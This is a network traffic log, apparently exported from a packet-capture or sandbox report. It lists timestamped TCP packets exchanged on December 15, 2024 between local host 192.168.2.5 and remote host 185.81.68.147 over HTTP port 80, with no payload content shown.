                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.472533941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.473684072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.473695993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.473819971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.474960089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.474996090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.654963970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.655064106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.655138969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.655189037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.656132936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.656219006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.656302929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.657371998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.657385111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.657484055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.658510923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.658523083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.658618927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.659687996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.659723997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.659970999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.660815001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.660918951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.661081076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.662071943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.662163019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663384914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663497925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663631916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663681030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.664345026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.664829969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.664988041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.665612936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.665647984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.665704012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.666656017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.666855097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.666959047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.668056965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.668174028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669104099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669140100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669173956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669207096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.670258999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.670336962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.670402050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.671382904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.671734095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.671780109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.672626019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.672661066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.672705889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.673835039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.673870087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.673918009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.674949884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.674984932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676119089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676152945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676186085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676218987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.677372932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.677407980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.677467108 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.678438902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.678555965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679682016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679747105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679835081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679887056 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.680998087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.681080103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.681130886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.682007074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.682039976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683211088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683271885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683398962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683445930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.684314013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.684366941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.685254097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.685398102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.685497999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.686669111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.686738014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.686994076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.687045097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.687848091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.687881947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689050913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689085960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689121962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689153910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.690300941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.690335035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.690397024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.691392899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.691472054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.692523003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.692559958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.871490002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.871503115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.871602058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.872562885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.872809887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.872905970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.873933077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.873944998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.874039888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.874886036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.874954939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.875051975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.876069069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.876416922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.876509905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.877187014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.877441883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.877559900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.878361940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.878452063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.878551006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.879565001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.879621029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.879715919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.880698919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.880789995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.880892992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.881871939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.881973028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.882061005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.883058071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.883153915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.883236885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.884238958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.884248972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.884335995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.885363102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.885411978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.885499954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.886456013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.886605978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.886694908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.887645960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.887782097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.887871027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.888741970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.888915062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.889003038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.890043020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.890053034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.890142918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.891097069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.891268015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.891421080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.892278910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.892422915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.892509937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.893455982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.893570900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.893657923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.894669056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.894766092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.894980907 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.895811081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.895847082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.895936012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.896956921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.897034883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.897221088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.898099899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.898456097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.898540974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.899354935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.899370909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.899454117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.900412083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.900626898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.900716066 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.901645899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.901657104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.901741982 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.902791023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.902806997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.902893066 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.903917074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.904031038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.904202938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.905153990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.905169010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.905251026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.906343937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.906353951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.906457901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.907346964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.958134890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.038603067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.038619995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.038743973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.089051962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.089144945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.090213060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.090225935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.090320110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.091368914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.091397047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.091489077 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.092442036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.092694998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.092813015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.093683004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.093696117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.093786955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.094845057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.094856024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.094954014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.095905066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.096338987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.096443892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.097067118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.097263098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.097348928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.098340988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.098351955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.098437071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.099368095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.145787001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.230703115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231133938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231250048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231281042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231302023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.231550932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.232367039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.232387066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.232480049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.233488083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.233499050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.233613014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.234548092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.234724998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.234814882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.235728025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.235831022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.235923052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.236892939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.237035990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.237121105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.238131046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.238142014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.238240957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.239267111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.239377022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.239660978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.240359068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.240608931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.240703106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.241571903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.241871119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.241966963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244848013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244859934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244869947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244882107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244959116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.244992971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.245573997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.245791912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.245884895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.246829987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.247111082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.247204065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248159885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248296976 CET8049708185.81.68.147192.168.2.5
